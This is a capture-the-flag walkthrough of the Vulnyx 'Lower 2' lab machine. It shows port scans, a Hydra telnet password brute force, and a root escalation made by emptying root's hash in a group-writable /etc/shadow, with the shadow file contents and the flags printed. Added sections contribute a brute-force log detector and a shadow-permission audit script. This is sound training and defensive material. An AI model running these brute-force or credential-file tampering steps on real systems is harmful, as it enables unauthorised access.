Vulnyx-Lower 2-Walkthrough
城南花已开

Information gathering

Service discovery

In addition to the usual ports, port 23 (telnet) is open.

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.186 08:00:27:d3:e0:8d (Unknown)
192.168.60.254 00:50:56:fd:65:82 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 4 responded
export ip=192.168.60.186
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.186:22
Open 192.168.60.186:23
Open 192.168.60.186:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 15:07 CST
Initiating ARP Ping Scan at 15:07
Scanning 192.168.60.186 [1 port]
Completed ARP Ping Scan at 15:07, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:07
Completed Parallel DNS resolution of 1 host. at 15:07, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:07
Scanning 192.168.60.186 [3 ports]
Discovered open port 23/tcp on 192.168.60.186
Discovered open port 22/tcp on 192.168.60.186
Discovered open port 80/tcp on 192.168.60.186
Completed SYN Stealth Scan at 15:07, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.186
Host is up, received arp-response (0.0011s latency).
Scanned at 2025-02-16 15:07:07 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
23/tcp open telnet syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:D3:E0:8D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Let's scan for directories.

❯ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.186/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

Nothing of interest.

Telnet brute force

Only telnet is left, so let's try brute-forcing it.

After trying root and lower2 without success, I noticed that SSH shows a banner welcoming you to b.taylor's server.

Brute-forcing that username is all it takes.

❯ ssh ada@$ip
The authenticity of host '192.168.60.186 (192.168.60.186)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.186' (ED25519) to the list of known hosts.

###################################################
### Welcome to Brian Taylor's (b.taylor) server ###
###################################################

ada@192.168.60.186: Permission denied (publickey).
❯ hydra -l b.taylor -P /usr/share/wordlists/rockyou.txt $ip telnet
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-16 15:20:14
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking telnet://192.168.60.186:23/
[23][telnet] host: 192.168.60.186 login: b.taylor password: rockyou
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-16 15:20:31
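From the defender's side, the Hydra run above leaves a very recognisable trace: a burst of failed logins for one username from one source, followed seconds later by a successful login from the same source. The following detector is an added example and not part of the original writeup. It works on a constructed auth.log excerpt whose message shapes follow util-linux login(1) syslog output (an assumption; adapt the regexes to what your distribution actually logs), and it flags both the burst itself and the success that comes right after it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt (not from the original post). The message shapes
# follow util-linux login(1) syslog output; treat the exact wording as an
# assumption and adapt the regexes to what your distribution actually logs.
SAMPLE_LOG = """\
Feb 16 15:20:14 lower2 login[1201]: FAILED LOGIN (1) on '/dev/pts/3' from '192.168.60.100' FOR 'b.taylor', Authentication failure
Feb 16 15:20:15 lower2 login[1202]: FAILED LOGIN (1) on '/dev/pts/4' from '192.168.60.100' FOR 'b.taylor', Authentication failure
Feb 16 15:20:17 lower2 login[1203]: FAILED LOGIN (1) on '/dev/pts/5' from '192.168.60.100' FOR 'b.taylor', Authentication failure
Feb 16 15:20:18 lower2 login[1204]: FAILED LOGIN (1) on '/dev/pts/3' from '192.168.60.100' FOR 'b.taylor', Authentication failure
Feb 16 15:20:20 lower2 login[1205]: FAILED LOGIN (1) on '/dev/pts/4' from '192.168.60.100' FOR 'b.taylor', Authentication failure
Feb 16 15:20:22 lower2 login[1206]: FAILED LOGIN (1) on '/dev/pts/5' from '192.168.60.100' FOR 'b.taylor', Authentication failure
Feb 16 15:20:25 lower2 login[1207]: FAILED LOGIN (1) on '/dev/pts/6' from '192.168.60.50' FOR 'admin', Authentication failure
Feb 16 15:20:31 lower2 login[1208]: LOGIN ON pts/7 BY b.taylor FROM 192.168.60.100
"""

TS = r"(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d)"
FAIL_RE = re.compile(TS + r" \S+ login\[\d+\]: FAILED LOGIN \(\d+\) on '[^']*' from '(?P<ip>[^']+)' FOR '(?P<user>[^']+)'")
OK_RE = re.compile(TS + r" \S+ login\[\d+\]: LOGIN ON \S+ BY (?P<user>\S+) FROM (?P<ip>\S+)")


def _parse_ts(text, year=2025):
    # syslog timestamps carry no year; the caller supplies it (assumed 2025 here)
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Sources with at least `threshold` failed logins inside any `window_s` second window."""
    failures = defaultdict(list)                   # ip -> [(timestamp, username)]
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            failures[m["ip"]].append((_parse_ts(m["ts"]), m["user"]))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        best, lo = 0, 0
        for hi in range(len(events)):              # sliding window over sorted timestamps
            while (events[hi][0] - events[lo][0]).total_seconds() > window_s:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            alerts[ip] = {
                "failures_in_window": best,
                "total_failures": len(events),
                "users": sorted({u for _, u in events}),
                "first": events[0][0],
                "last": events[-1][0],
            }
    return alerts


def successes_after_burst(log_text, alerts, grace_s=300):
    """Successful logins from an alerted source within grace_s of its last failure."""
    hits = []
    for line in log_text.splitlines():
        m = OK_RE.match(line)
        if not m or m["ip"] not in alerts:
            continue
        t = _parse_ts(m["ts"])
        delta = (t - alerts[m["ip"]]["last"]).total_seconds()
        if 0 <= delta <= grace_s:
            hits.append((m["ip"], m["user"], t))
    return hits


if __name__ == "__main__":
    alerts = detect_bruteforce(SAMPLE_LOG)
    for ip, info in alerts.items():
        print(f"brute force from {ip}: {info['failures_in_window']} failures in window, users={info['users']}")
    for ip, user, t in successes_after_burst(SAMPLE_LOG, alerts):
        print(f"likely compromise: {user} logged in from {ip} at {t} right after the burst")
```

The second signal matters more than the first: a failure burst alone is noise on any internet-facing box, but a success from the same source within minutes of the burst is what turns the alert into an incident. Note that the username came from the SSH banner, so the real fix on this box is twofold: stop leaking account names in banners, and retire telnet in favour of key-based SSH, which the Hydra output itself points out is the more reliable protocol to protect.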

User access

Log in via telnet.

❯ telnet $ip
Trying 192.168.60.186...
Connected to 192.168.60.186.
Escape character is '^]'.


lower2 login: b.taylor
Password:
Last login: Sun Feb 16 08:20:27 CET 2025 on pts/7
b.taylor@lower2:~$ ls
user.txt
b.taylor@lower2:~$ cat user.txt
edc9f5c55af87505033a20dd41931364

That gives us the user flag right away.

Root privilege escalation

From id we can see that the user belongs to the shadow group.

So just remove root's password.

b.taylor@lower2:/tmp$ id
uid=1000(b.taylor) gid=1000(b.taylor) grupos=1000(b.taylor),42(shadow)
b.taylor@lower2:/tmp$ cat /etc/shadow
root:$y$j9T$RDW/7EgA4sElvqxLVk.Uo.$OmF5Lm4Ub/UeC2ua6tTQnHB07WKpYs1lOXl.lS581q8:20134:0:99999:7:::
daemon:*:19676:0:99999:7:::
bin:*:19676:0:99999:7:::
sys:*:19676:0:99999:7:::
sync:*:19676:0:99999:7:::
games:*:19676:0:99999:7:::
man:*:19676:0:99999:7:::
lp:*:19676:0:99999:7:::
mail:*:19676:0:99999:7:::
news:*:19676:0:99999:7:::
uucp:*:19676:0:99999:7:::
proxy:*:19676:0:99999:7:::
www-data:*:19676:0:99999:7:::
backup:*:19676:0:99999:7:::
list:*:19676:0:99999:7:::
irc:*:19676:0:99999:7:::
_apt:*:19676:0:99999:7:::
nobody:*:19676:0:99999:7:::
systemd-network:!*:19676::::::
messagebus:!:19676::::::
sshd:!:19676::::::
b.taylor:$y$j9T$du9sW7McN8WfjLKPRheP7/$pyE/4IrgDjurpaNzpdyxj8PYcOYyDksyYPG2rxEBxm4:20135:0:99999:7:::
telnetd-ssl:!:20134::::::
b.taylor@lower2:/tmp$ ls -al /etc/shadow
-rw-rw---- 1 root shadow 749 feb 16 07:10 /etc/shadow
b.taylor@lower2:/tmp$ vi /etc/shadow
b.taylor@lower2:/tmp$ su root
root@lower2:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@lower2:/tmp# cat /root/root.txt
235aa90b688b711a87d5d15c6e34dada
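The whole escalation rests on two misconfigurations visible in the session above: /etc/shadow is group-writable (-rw-rw---- instead of the Debian default -rw-r-----), and an ordinary user sits in the shadow group. The audit script below is an added example and not part of the original writeup. It parses the ls -l mode string, checks the ownership and permission bits, scans shadow entries for empty or weak password fields (an emptied hash is exactly what "remove root's password" leaves behind), and lists who is in the shadow group. The /etc/group excerpt and the post-edit root entry are constructed; the shadow hashes are the ones shown on the page.

```python
import stat

# Constructed /etc/group excerpt (not from the original post) reproducing the
# supplementary membership that id reported on the box.
GROUP_SAMPLE = "root:x:0:\nshadow:x:42:b.taylor\n"

# /etc/shadow entries as shown in the writeup (hash values taken from the page).
SHADOW_BEFORE = """\
root:$y$j9T$RDW/7EgA4sElvqxLVk.Uo.$OmF5Lm4Ub/UeC2ua6tTQnHB07WKpYs1lOXl.lS581q8:20134:0:99999:7:::
daemon:*:19676:0:99999:7:::
sshd:!:19676::::::
b.taylor:$y$j9T$du9sW7McN8WfjLKPRheP7/$pyE/4IrgDjurpaNzpdyxj8PYcOYyDksyYPG2rxEBxm4:20135:0:99999:7:::
"""

# Constructed: what the root entry looks like once its hash field has been emptied.
SHADOW_AFTER = "root::20134:0:99999:7:::\n"


def mode_from_ls(perm):
    """Convert an ls -l permission string such as '-rw-rw----' into a mode integer."""
    bits = perm[1:10]
    if len(bits) != 9:
        raise ValueError(f"not a permission string: {perm!r}")
    mode = 0
    for i, ch in enumerate(bits):
        if ch in "rwxst":          # lowercase s/t imply the x bit is also set
            mode |= 1 << (8 - i)
        if ch in "sS" and i == 2:
            mode |= stat.S_ISUID
        if ch in "sS" and i == 5:
            mode |= stat.S_ISGID
        if ch in "tT" and i == 8:
            mode |= stat.S_ISVTX
    return mode


def audit_shadow_mode(mode, owner="root", group="shadow"):
    """Findings for the ownership and permission bits of /etc/shadow."""
    findings = []
    if owner != "root":
        findings.append(f"owner is {owner}, expected root")
    if group not in ("root", "shadow"):
        findings.append(f"group is {group}, expected root or shadow")
    if mode & stat.S_IWGRP:
        findings.append(f"group-writable: every member of '{group}' can rewrite any password hash")
    if mode & stat.S_IRWXO:
        findings.append("world-accessible")
    if mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append("executable bits set")
    return findings


def audit_shadow_entries(shadow_text):
    """Findings for individual shadow entries: empty, weak or malformed password fields."""
    findings = []
    for n, line in enumerate(shadow_text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            findings.append(f"line {n}: malformed entry ({len(fields)} fields)")
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append(f"{user}: empty password field, account can be entered without a password")
        elif pw.startswith("$1$"):
            findings.append(f"{user}: md5crypt hash, should be rehashed with yescrypt or sha512crypt")
        elif not pw.startswith(("$", "!", "*")):
            findings.append(f"{user}: unrecognised password field {pw[:4]!r}")
    return findings


def members_of_group(group_text, name):
    """Supplementary members of a group, parsed from /etc/group content."""
    for line in group_text.splitlines():
        f = line.split(":")
        if len(f) == 4 and f[0] == name:
            return [m for m in f[3].split(",") if m]
    return []


if __name__ == "__main__":
    mode = mode_from_ls("-rw-rw----")          # the mode observed in the writeup
    for f in audit_shadow_mode(mode):
        print("[mode]", f)
    for f in audit_shadow_entries(SHADOW_AFTER):
        print("[entry]", f)
    print("[group] shadow members:", members_of_group(GROUP_SAMPLE, "shadow"))
```

Run against the values from the session, the mode check reports the group-writable bit, the entry check reports root's emptied password field, and the group check shows b.taylor as a shadow member. The remediation is equally short: chmod 640 /etc/shadow, take the user out of the shadow group (gpasswd -d b.taylor shadow), and reset root's password. Keep in mind that read access to /etc/shadow is already a problem on its own, since it hands out the hashes for offline cracking; the write bit merely makes the cracking step unnecessary.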

Done in just a few minutes 😅
